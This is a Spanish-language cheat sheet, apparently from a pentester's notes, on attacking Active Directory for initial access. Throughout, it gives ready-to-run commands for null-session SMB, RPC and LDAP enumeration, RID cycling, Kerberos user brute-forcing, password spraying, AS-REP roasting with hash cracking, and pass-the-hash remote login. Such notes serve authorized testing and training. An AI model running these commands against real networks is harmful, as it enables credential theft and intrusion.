🔷Enumeración Básica

Enumeración de Active Directory para obtener un acceso inicial

Mapping Network

Host Discovery

fping

fping -agp <ip-range>

nmap ping scan

nmap -sn <ip-range>

Port Scanning

Puertos y Protocolos comunes en AD

Puerto

Protocolo

Enfoque

Kerberos

Potencial enumeración de Kerberos

135

MS-RPC

Potencial enumeración RPC (null sessions)

139

SMB/NetBIOS

Acceso SMB heredado

389

LDAP

Peticiones LDAP a AD

445

SMB

Acceso SMB moderno, fundamental para enumeración

464

Kerberos (kpasswd)

Servicio Kerberos relacionado con contraseñas

nmap SYN scan a todos los puertos

nmap -sS -p- -T3 -iL hosts.txt -oN full-nmap.txt

nmap específico a servicios y versiones

nmap -p <ports> -sCV -iL hosts.txt

Network Enumeration - SMB

Listing SMB Shares

Comprobar null session

smbclient -L //<ip> -N

Listar permisos de shares

smbmap -H <ip>

nmap -p 445 --script smb-enum-shares <ip>

Accessing SMB Shares

Acceder a share con null session

smbclient //<ip>/<share-name> -N

Acceder con credenciales

smbclient //<ip>/<share-name> --user=<username> --password=<pass> -W <domain>

Domain Enumeration

LDAP Enumeration

Comprobar si Anonymous Bind está habilitado

ldapsearch -x -H ldap://<ip> -s base
# Da bastante ouput si está habilitado

Solicitar información de usuarios - Anonymous Bind

ldapsearch -x -H ldap://<ip> -b "<dc=name,dc=name...>" "(objectClass=person)"

Extraer información de usuarios + descripciones

nxc ldap <ip> -u "uwu" -p "" --users

Enum4linux-ng

Obtener información sobre el DC

enum4linux-ng -A <ip>

RPC Enumeration via Null Session

rpcclient -U "" <ip> -N # verificar acceso RPC con null session
> enumdomusers # enumerar usuarios y RID
> help # lista comandos disponibles

Script para solicitar individualmente cada RID de usuario

for i in $(seq 500 2000); do echo "queryuser $i" |rpcclient -U "" -N <ip> 2>/dev/null | grep -i "User Name"; done

Username Enumeration with Kerbrute

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

Enumeración de usuarios por fuerza bruta contra Kerberos

./kerbrute userenum --dc <ip> -d <domain-name> users.txt
# users.txt = lista de potenciales usuarios recogidos con rpcclient/enum4linux-ng

Kerbrute Password Bruteforce

kerbrute bruteuser --dc <ip> -d <domain> passes.txt <username>

Password Spraying

Password Policy Check

rpcclient

Solicitar política de contraseñas al DC

rpcclient -U "" <ip> -N
> getdompwinfo

crackmapexec

Obtener política de contraseñas

crackmapexec smb <ip> --pass-pol

Password Spraying Attack with CrackMapExec

crackmapexec smb <ip> -u users.txt -p passwords.txt

AS-REP Roasting

Enumeración - `UF_DONT_REQUIRE_PREAUTH`

Enumeración de usuarios vulnerables y recopilación de hashes AS-REP

impacket-GetNPUsers <domain-name>/ -dc-ip <ip> -usersfile users.txt -format hashcat -outputfile hashes.txt -no-pass

Explotación

Desencriptado en modo hash AS-REP de Kerberos

hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Sesión Windows Remota

Comprobar credenciales

netexec winrm <computer>.<domain> -u <username> -p '<password>'

Iniciar sesión remota con password

evil-winrm -i <ip> -u <username> -p '<password>'

Iniciar sesión remota con hash

evil-winrm -i <ip> -u <username> -H '<hash>'

Última actualización hace 3 meses